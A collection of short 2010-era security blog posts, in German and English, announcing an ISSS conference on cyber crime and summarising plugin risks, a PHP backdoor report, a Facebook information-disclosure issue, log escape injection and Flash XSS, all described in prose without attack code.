Als Aspirant für den Vorstand in der Information Security Society Switzerland (ISSS) habe ich zusammen mit Lukas Ruf die St.Galler Tagung am 29. April 2010 organisiert. Diese hat das Thema "Cyber Crime und die Schweiz" und ich denke es ist ein sehr ansprechendes Programm (kostenlos) zusammen gestellt worden.

17:30 - 17:40		Begrüssung Dr. Lukas Ruf, Consecom AG
17:40 - 18:15		Cyber Crime und die Schweiz Marc Henauer, FEDPOL/KOBIK
18:15 - 18:50		European Cyber Crime Convention Lic. iur. Fürsprech Beat Lehmann, Lehrbeauftragter Uni Zürich für Informatikrecht
18:50 - 19:00		Pause
19:00 - 19:35		Cyber Underground Ivan Bütler, Compass Security AG
19:35 - 20:10		Google's Anti-Phishing/Anti-Malware Efforts Noé Lutz, SafeBrowsing Team, Google Inc., USA
20:10 - 20:15		Abschluss der Tagung Dr. Thomas Dübendorfer, Präsident ISSS
20:15 - ca. 20:45		Apéro

Würde mich freuen wenn ich einige Blog Leser begrüssen könnte.

Anmeldung unter: http://www.isss.ch/veranstaltungen/2010/st-galler-tagung/

Grüsse
Ivan Bütler
E1

Der Einsatz von Firefox Plugins als kleine Helferlein für das tägliche Surfen hat sich zumindest bei mir fest etabliert. Doch wie gut prüfe ich jeweils die Qualität der Plugins? Können die Plugins Schadsoftware enthalten?

Um diese Frage zu erörtern habe ich einen kleinen Movie erstellt der zeigt, wie einfach ein Plugin in ein Observation Plugin verändert werden kann.

Meine Empfehlung ist deshalb, Webseiten die eine erhöhte Vertraulichkeit verlangen mit reduzierten Firefox Instanzen zu besuchen. Dies kann man mit Firefox Profilen erreichen, indem man beispielsweise ein Profile ohne jegliche Plugins und Add-Ons erstellt. Um den Profil Manager von Firefox zu starten gebe man folgenden Befehl ein

firefox -P

Ansonsten hilft der Film weiter. Dieser kann auf http://www.hacking-lab.com/download geschaut werden.

Grüsse
E1

Dear Blog Reader,

I love open source software and I could not live without Apache, Tomcat, MySQL and others. But what about the trust I have to give into this software components? Today, I got another sense of disappointment because a backdoor was found in a recent PHP application.


============ BACKDOOR class2.php, line: 1876 ============


============ BACKDOOR class2.php, line: 1876 ============

How do you evaluate the trust level of open source software?

Regards
Ivan

Reference: Bugtraq by Bogdan Calin - Mon 1/25/2010 11:59 AM

Facebook is becoming more and more a target for security researchers. Today I read the bugtraq posting from Quaji about CSID (dubbed Cross Site Identification) attack where an attacker page could gain a victim's Facebook friend list if the user is concurrently authenticated in Facebook and visiting the malicious page.

http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html

The issue is rather complex and long and therefore I give my best to shorten the story for you.

Facebook has some kind of SSO (single-sign functionality). This is extremely useful when you are building your own Facebook applications on apps.facebook.com. The Facebook applications on apps.facebook.com inherit the user principle in certain situations and this is the attack vector exploited in Quaji's advisory. For Facebook, this is a feature for enabling single-sign on. For the researchers it is a vulnerability because everyone can register and write applications on apps.facebook.com.

The flash video presented by Quaji shows how the user is concurrently authenticated in Facebook and a malicious page. When the page is loaded by the user, an image tag loads the image and after some redirects, the final image is delivered by the malicious page and the principle information, containing userID, friends and more is seen in the attackers malicious web site log.

In other words - in some cases Facebook acts as proxy and requests the requested resource on behalf of the user. This requests could contain the Facebook principle - not in all, but in certain cases.

What can we learn from this posting and video? The same we know from the e-banking situation. Don't visit your e-banking server concurrently while you are visiting other internet pages. Do your business in single browser instances and deny tabbed browsing for your own security.

Have a safe day

Ivan

 

What is Second Order Injection? In some cases the attackers are able to store their malicious code into a storage area of a web application that may be executed at later time or date. Some smart "hackers" change the Browsers "User Agent" into a Cross Site Scripting pattern and when the log is analyzed at later time, a successful cross site scripting exploitation could be executed.

This is all known - but one could insert special characters that have a special meaning in your shell (bash/csh/ksh/..) to exploit a "grep" or "tail" command once the log is analyzed manually with a terminal.

The authors name it as "log escape sequence injection". A large list of web application servers are vulnerable! (not Apache)

Please review the alert message from the authors.

Have a safe day

Ivan

Shortly, Compass Security found out some cross site scripting vulnerabilities in Camtasia generated flash applications. This vulnerability is the basis of a new Hacking Lab Challenge, especially for the audience of the next Swiss Cyber Storm III Challenge.

Nevertheless, this morning I was made aware of another Flash vulnerability in tagcloud.swf, potentially available in more than 34 million flash files world wide. In the last couple of weeks Compass is being asked about the security implications of adding a flash application to the secure web container like e-banking, online trading or the secure portal area. Compass highly recommends analyzing your flash files for cross site and similar, especially when they are generated out of tool than written manually by your professionals.

Have a safe day
Ivan